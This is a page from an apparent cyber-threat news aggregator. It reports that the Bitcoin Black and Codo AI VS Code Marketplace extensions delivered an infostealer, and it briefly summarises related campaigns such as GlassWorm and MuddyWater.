Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

Bitcoin Black and Codo AI VS Code extensions delivering infostealer

Malware Activity
First reported
Last updated
Happening score
H score 34
2 unique sources, 2 articles

Summary

Hide ▲

The Bitcoin Black and Codo AI extensions on Microsoft's Visual Studio Code Marketplace are delivering an infostealer to developers' machines, creating immediate risk of stolen credentials, crypto wallets, and browser sessions. The malicious code uses DLL hijacking and hidden download steps to avoid obvious user warnings. The activity matters because compromised developer workstations can expose both local secrets and active online sessions.

Related Happenings

MuddyWater broad cyber-espionage campaign across sectors and countries

Campaign
First: 14.05.2026 00:59 Last: 14.05.2026 00:59 Sources 1

About this happening: **MuddyWater** was tied to a **2026 espionage campaign** affecting **at least nine organizations** across **nine countries** on **four continents**, with victims in **industrial a...

Open Happening

GlassWorm Zig dropper infecting developer IDEs

Malware Activity
First: 10.04.2026 16:23 Last: 10.04.2026 16:23 Sources 1

About this happening: The **GlassWorm** malware set now uses a **Zig dropper** that can silently infect **all VS Code-based IDEs** on a developer's machine, widening the reach of the compromise. The pa...

Open Happening

GlassWorm supply-chain malware wave across GitHub, npm, and VSCode/OpenVSX

Malware Activity
First: 17.03.2026 23:42 Last: 17.03.2026 23:42 Sources 1

About this happening: **GlassWorm** returned in a **new coordinated supply-chain attack** that compromised **433 components** across **GitHub, npm, and VSCode/OpenVSX**, creating a broad software-distr...

Latest development: 28.04.2026 00:41

GlassWorm returned in an OpenVSX supply-chain wave with 73 cloned sleeper extensions that were benign at upload and later turned malicious after an update, with six already activated to deliver malware. The extensions act as thin loaders that fetch payloads through GitHub-hosted secondary VSIX packages, platform-specific .node modules, or heavily obfuscated JavaScript, shifting the campaign toward submitting innocuous extensions first and introducing the malicious payload later.

Open Happening

Storm-2561 SEO-poisoning VPN credential-theft campaign

Campaign
First: 13.03.2026 15:38 Last: 13.03.2026 15:38 Sources 1

About this happening: The **Storm-2561** group is running a **credential-theft campaign** that uses **SEO poisoning** and fake **VPN clients** to steal **VPN credentials** from people searching for ent...

Open Happening

A0Backdoor malware deployed through signed MSI sideloading and DNS MX C2

Malware Activity
First: 10.03.2026 00:50 Last: 10.03.2026 00:50 Sources 1

About this happening: The **A0Backdoor** malware was deployed on **Windows endpoints** through **digitally signed MSI installers** and **DLL sideloading**, giving the operators a stealthier path to exe...

Open Happening

Timeline

  1. 09.12.2025 00:30 2 articles · 5mo ago

    Koi Security reports malicious VS Code extensions on Microsoft's registry

    Initial Disclosure

    Koi Security identified Bitcoin Black and Codo AI on Microsoft's Visual Studio Code Marketplace as malicious extensions that masquerade as a color theme and an AI assistant while delivering an infostealer to developers' machines, with capabilities to steal screenshots, credentials, browser sessions, and crypto wallets.

    Show sources
    Open in new tab